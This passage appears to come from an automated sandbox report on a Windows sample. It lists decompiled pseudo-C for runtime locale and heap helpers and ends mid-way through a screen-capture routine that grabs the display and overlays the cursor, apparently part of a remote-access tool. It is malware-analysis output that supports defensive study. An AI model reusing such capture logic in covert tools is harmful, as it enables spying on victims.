					_t24 = E0044E1A1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
					if(_t24 != 0) {
						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
							_t31 = E0044E1A1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
							if(_t31 == 0) {
								_push(_t50);
								_push(_t31);
								goto L9;
							}
						}
					} else {
						if( *(_t35 + 0x60) != _t24) {
							L10:
							 *_t50 =  *_t50 | 0x00000004;
							_t50[1] = _t53;
							_t50[2] = _t53;
						} else {
							_push(_t50);
							_push(1);
							L9:
							_push(_t53);
							if(E0044BA13(_t35) != 0) {
								goto L10;
							}
						}
					}
				} else {
					 *_t50 =  *_t50 & _t22;
				}
				return E00430A5B(_v8 ^ _t54);
			}














                                                                                                0x0044b7ee
                                                                                                0x0044b7f5
                                                                                                0x0044b803
                                                                                                0x0044b80b
                                                                                                0x0044b81a
                                                                                                0x0044b826
                                                                                                0x0044b837
                                                                                                0x0044b83f
                                                                                                0x0044b850
                                                                                                0x0044b859
                                                                                                0x0044b869
                                                                                                0x0044b87b
                                                                                                0x0044b884
                                                                                                0x0044b886
                                                                                                0x0044b887
                                                                                                0x00000000
                                                                                                0x0044b887
                                                                                                0x0044b884
                                                                                                0x0044b85b
                                                                                                0x0044b85e
                                                                                                0x0044b895
                                                                                                0x0044b895
                                                                                                0x0044b898
                                                                                                0x0044b89b
                                                                                                0x0044b860
                                                                                                0x0044b860
                                                                                                0x0044b861
                                                                                                0x0044b888
                                                                                                0x0044b888
                                                                                                0x0044b893
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b893
                                                                                                0x0044b85e
                                                                                                0x0044b841
                                                                                                0x0044b841
                                                                                                0x0044b843
                                                                                                0x0044b8b8

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442FC7
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FD4
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044B837
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                • String ID:
                                                                                                • API String ID: 1663032902-0
                                                                                                • Opcode ID: ca68c6d01fcc24e129668e9dafec227d227110ca5be198b28b3e6f360603ae01
                                                                                                • Instruction ID: 4883689988dfa2bd060ce291fedfd87b5dd127c4c2c23a0e55befbbcb8e090ac
                                                                                                • Opcode Fuzzy Hash: ca68c6d01fcc24e129668e9dafec227d227110ca5be198b28b3e6f360603ae01
                                                                                                • Instruction Fuzzy Hash: 3921D37260020AABFF24AE25DC42ABB77ACEB44315F1001BFF805D6241EB78DD45CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044B46B, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 91%
                                                                                                			E0044B46B(void* __ecx, void* __edx, signed int* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				void* _t36;
				intOrPtr* _t39;
				intOrPtr* _t42;
				signed int _t48;
				void* _t51;
				void* _t52;
				signed int* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E00442F68(_t36, __ecx, __edx);
				_t48 = 2;
				_t39 =  *((intOrPtr*)(_t54 + 0x50));
				_t51 = _t39 + 2;
				do {
					_t26 =  *_t39;
					_t39 = _t39 + _t48;
				} while (_t26 != 0);
				_t42 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
				_t52 = _t42 + 2;
				do {
					_t29 =  *_t42;
					_t42 = _t42 + _t48;
				} while (_t29 != 0);
				_t53 = _a4;
				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
				_t53[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t48 = E0044B567( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t48;
				_t32 = EnumSystemLocalesW(E0044B593, 1);
				_t62 =  *_t53 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t53 = 0;
					return _t34;
				}
				return _t34;
			}



















                                                                                                0x0044b478
                                                                                                0x0044b47e
                                                                                                0x0044b47f
                                                                                                0x0044b482
                                                                                                0x0044b485
                                                                                                0x0044b485
                                                                                                0x0044b488
                                                                                                0x0044b48a
                                                                                                0x0044b498
                                                                                                0x0044b49e
                                                                                                0x0044b4a1
                                                                                                0x0044b4a4
                                                                                                0x0044b4a4
                                                                                                0x0044b4a7
                                                                                                0x0044b4a9
                                                                                                0x0044b4b2
                                                                                                0x0044b4bd
                                                                                                0x0044b4c0
                                                                                                0x0044b4c6
                                                                                                0x0044b4d1
                                                                                                0x0044b4d1
                                                                                                0x0044b4da
                                                                                                0x0044b4dd
                                                                                                0x0044b4e5
                                                                                                0x0044b4eb
                                                                                                0x0044b4ef
                                                                                                0x0044b4f4
                                                                                                0x0044b4f8
                                                                                                0x0044b4fd
                                                                                                0x0044b4ff
                                                                                                0x00000000
                                                                                                0x0044b4ff
                                                                                                0x0044b505

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • EnumSystemLocalesW.KERNEL32(0044B593,00000001,00000000,?,0043F5A1,?,0044BBC0,00000000,?,?,?), ref: 0044B4DD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 2834af847882fa2f6e039046bccdb1f0bf951b73f06b5d90b37e1c263ad03e48
                                                                                                • Instruction ID: a3673f804c47cda1b416b90d5a5dff247ef08c8184ae1175a6835ed20c2b628c
                                                                                                • Opcode Fuzzy Hash: 2834af847882fa2f6e039046bccdb1f0bf951b73f06b5d90b37e1c263ad03e48
                                                                                                • Instruction Fuzzy Hash: 3A1129362007015FEB189F39D89167AB792FF8435CB54442DE94647B41D775F942C784
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044BA13, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E0044BA13(void* __ebx, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t24;
				signed int _t27;
				intOrPtr* _t29;

				_push(_t16);
				_t8 = E00442F68(__ebx, _t16, _t22);
				_t27 = _a4;
				_t24 = _t8;
				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
					if(_t27 == _v8 || _a8 == 0) {
						L7:
						_t12 = 1;
					} else {
						_t29 =  *((intOrPtr*)(_t24 + 0x50));
						_t20 = _t29 + 2;
						do {
							_t13 =  *_t29;
							_t29 = _t29 + 2;
						} while (_t13 != 0);
						if(E0044B567( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
							goto L1;
						} else {
							goto L7;
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				return _t12;
			}















                                                                                                0x0044ba18
                                                                                                0x0044ba1b
                                                                                                0x0044ba20
                                                                                                0x0044ba23
                                                                                                0x0044ba47
                                                                                                0x0044ba50
                                                                                                0x0044ba7a
                                                                                                0x0044ba7c
                                                                                                0x0044ba58
                                                                                                0x0044ba58
                                                                                                0x0044ba5b
                                                                                                0x0044ba5e
                                                                                                0x0044ba5e
                                                                                                0x0044ba61
                                                                                                0x0044ba64
                                                                                                0x0044ba78
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044ba78
                                                                                                0x0044ba49
                                                                                                0x0044ba49
                                                                                                0x0044ba49
                                                                                                0x0044ba49
                                                                                                0x0044ba82

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044B7B1,00000000,00000000,?), ref: 0044BA3F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 2692324296-0
                                                                                                • Opcode ID: 1df243cee8360a8245b836b1d21f77b96c9f1cd7b6a2f688ca4746fff15e7596
                                                                                                • Instruction ID: 267ac3bbd4bcd688a69e1ea16a55a09bfb8a1038d8ef0e2165b6f821a0fe1107
                                                                                                • Opcode Fuzzy Hash: 1df243cee8360a8245b836b1d21f77b96c9f1cd7b6a2f688ca4746fff15e7596
                                                                                                • Instruction Fuzzy Hash: 6EF0F936500115BFEB289A65C8067BB77A8EB40758F04446AFC59B3240EB78FE52C6D4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044B506, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0044B506(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t11;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				intOrPtr* _t20;
				intOrPtr _t25;
				void* _t26;
				void* _t27;

				_t27 = E00442F68(_t17, __ecx, __edx);
				_t25 = 2;
				_t20 =  *((intOrPtr*)(_t27 + 0x50));
				_t26 = _t20 + 2;
				do {
					_t11 =  *_t20;
					_t20 = _t20 + _t25;
				} while (_t11 != 0);
				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
				 *(_t27 + 0x60) = _t13;
				if(_t13 == 0) {
					_t25 = E0044B567( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
				EnumSystemLocalesW(E0044B7E3, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}













                                                                                                0x0044b513
                                                                                                0x0044b519
                                                                                                0x0044b51a
                                                                                                0x0044b51d
                                                                                                0x0044b520
                                                                                                0x0044b520
                                                                                                0x0044b523
                                                                                                0x0044b525
                                                                                                0x0044b533
                                                                                                0x0044b536
                                                                                                0x0044b53b
                                                                                                0x0044b546
                                                                                                0x0044b546
                                                                                                0x0044b54f
                                                                                                0x0044b552
                                                                                                0x0044b558
                                                                                                0x0044b55e
                                                                                                0x0044b560
                                                                                                0x00000000
                                                                                                0x0044b560
                                                                                                0x0044b566

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • EnumSystemLocalesW.KERNEL32(0044B7E3,00000001,?,?,0043F5A1,?,0044BB84,0043F5A1,?,?,?,?,?,0043F5A1,?,?), ref: 0044B552
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: b4792a74760ef4de9a6b3efe77471714ad7da75a8631f98d6413e5785f997c91
                                                                                                • Instruction ID: e093ffcd1a57556c947852d68d87e69df4d90f28677438228c844fb72df21d41
                                                                                                • Opcode Fuzzy Hash: b4792a74760ef4de9a6b3efe77471714ad7da75a8631f98d6413e5785f997c91
                                                                                                • Instruction Fuzzy Hash: 68F0AF362003046FEB249E399C81B7ABB95EF8076CF55442EF9458B690D7B5D9428684
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00443157, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E00443157(void* __eflags) {
				int _t15;
				void* _t28;

				E004308A0(0x469430, 0xc);
				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
				E004403BD( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *0x46d728 = E0043EC2D( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
				_t15 = EnumSystemLocalesW(E00443111, 1);
				_push(0x20);
				asm("ror eax, cl");
				 *0x46d728 = 0 ^  *0x46c00c;
				 *(_t28 - 0x1c) = _t15;
				 *(_t28 - 4) = 0xfffffffe;
				E004431CF();
				return E004308E6();
			}





                                                                                                0x0044315e
                                                                                                0x00443163
                                                                                                0x0044316c
                                                                                                0x00443172
                                                                                                0x00443183
                                                                                                0x0044318f
                                                                                                0x0044319f
                                                                                                0x004431a6
                                                                                                0x004431ae
                                                                                                0x004431b3
                                                                                                0x004431b6
                                                                                                0x004431bd
                                                                                                0x004431c9

                                                                                                APIs
                                                                                                  • Part of subcall function 004403BD: EnterCriticalSection.KERNEL32(?,?,0043DB54,00000000,00469288,0000000C,0043DB0F,?,?,?,0044065B,?,?,0044301D,00000001,00000364), ref: 004403CC
                                                                                                • EnumSystemLocalesW.KERNEL32(00443111,00000001,00469430,0000000C), ref: 0044318F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: c3ab90c1b19eddda106406a361ec7550520fda4e3b911b3704e0838e1d06168f
                                                                                                • Instruction ID: dc7c6ea09f487e144a9768f5fcd245d54a3073a5771f399359e22bc5bd9b1ceb
                                                                                                • Opcode Fuzzy Hash: c3ab90c1b19eddda106406a361ec7550520fda4e3b911b3704e0838e1d06168f
                                                                                                • Instruction Fuzzy Hash: 5AF04471A10200DFDB00EF65D846B5D77E0EB08729F10512AF410DB292D7B949508F5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044B420, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0044B420(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t20 = E00442F68(_t14, __ecx, __edx);
				_t16 =  *((intOrPtr*)(_t20 + 0x54));
				_t22 = _t16 + 2;
				do {
					_t9 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t9 != 0);
				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x44b377, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}










                                                                                                0x0044b42c
                                                                                                0x0044b430
                                                                                                0x0044b433
                                                                                                0x0044b436
                                                                                                0x0044b436
                                                                                                0x0044b439
                                                                                                0x0044b43c
                                                                                                0x0044b454
                                                                                                0x0044b457
                                                                                                0x0044b45d
                                                                                                0x0044b463
                                                                                                0x0044b465
                                                                                                0x00000000
                                                                                                0x0044b465
                                                                                                0x0044b46a

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • EnumSystemLocalesW.KERNEL32(0044B377,00000001,?,?,?,0044BBE2,0043F5A1,?,?,?,?,?,0043F5A1,?,?,?), ref: 0044B457
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 5b08bd6b1f1928fb0761889b043aa2dc8d7f430290edd8396b1b8277053c2117
                                                                                                • Instruction ID: a897fd305ca8807e55f31d196f158543e65fa4b24f855604ea08a8b01ac4b1fb
                                                                                                • Opcode Fuzzy Hash: 5b08bd6b1f1928fb0761889b043aa2dc8d7f430290edd8396b1b8277053c2117
                                                                                                • Instruction Fuzzy Hash: 34F0553630030597DB049F36D849B6ABF90EFC2B18F8A405EFE058BA91C779D882C794
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040D22F, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E0040D22F(void* __ecx) {
				char _v8;
				void* _t8;
				void* _t12;

				_push(__ecx);
				_t12 = __ecx;
				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
				E00402076(_t8, _t12,  &_v8);
				return _t12;
			}






                                                                                                0x0040d232
                                                                                                0x0040d239
                                                                                                0x0040d243
                                                                                                0x0040d24f
                                                                                                0x0040d25a

                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00412852,0046E250,pf,0046E250,00000000,0046E250,00000000,0046E250,3.3.2 Pro), ref: 0040D243
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: 100b747ce23e4dba353a53faad1730ba49b7ac857d5b9659618b82d41eadafc0
                                                                                                • Instruction ID: 83cff444f68df461cc82d9c77df0a2b737465fda6a9e55d580c5b63673f1b680
                                                                                                • Opcode Fuzzy Hash: 100b747ce23e4dba353a53faad1730ba49b7ac857d5b9659618b82d41eadafc0
                                                                                                • Instruction Fuzzy Hash: AFD05E30B4031C7BEA1096859D0AEAB7B9CE701B66F0001A6BA05D72C0E9E1AE0087E6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044901D, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0044901D() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x46da48 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                                                0x0044901d
                                                                                                0x00449025
                                                                                                0x0044902d

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: fdc75935e2465adbdd08d4a033cff70419e344281e7d8ffa9129cbe36d6bf65c
                                                                                                • Instruction ID: bcc5082b27cef1b07eafcec92a8a02796c4a05d2a173bd6540a3d44543ef606f
                                                                                                • Opcode Fuzzy Hash: fdc75935e2465adbdd08d4a033cff70419e344281e7d8ffa9129cbe36d6bf65c
                                                                                                • Instruction Fuzzy Hash: 01A01230B043008B43504F306A042083698568058131040359105C4460E63081A05705
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004152EA, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 298windowmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 81%
                                                                                                			E004152EA(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = E00415721( *((intOrPtr*)(0x46dd68 + _a4 * 4)));
				_t114 = E0041576D( *((intOrPtr*)(0x46dd68 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							E004157AE( *((intOrPtr*)(0x46dd68 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
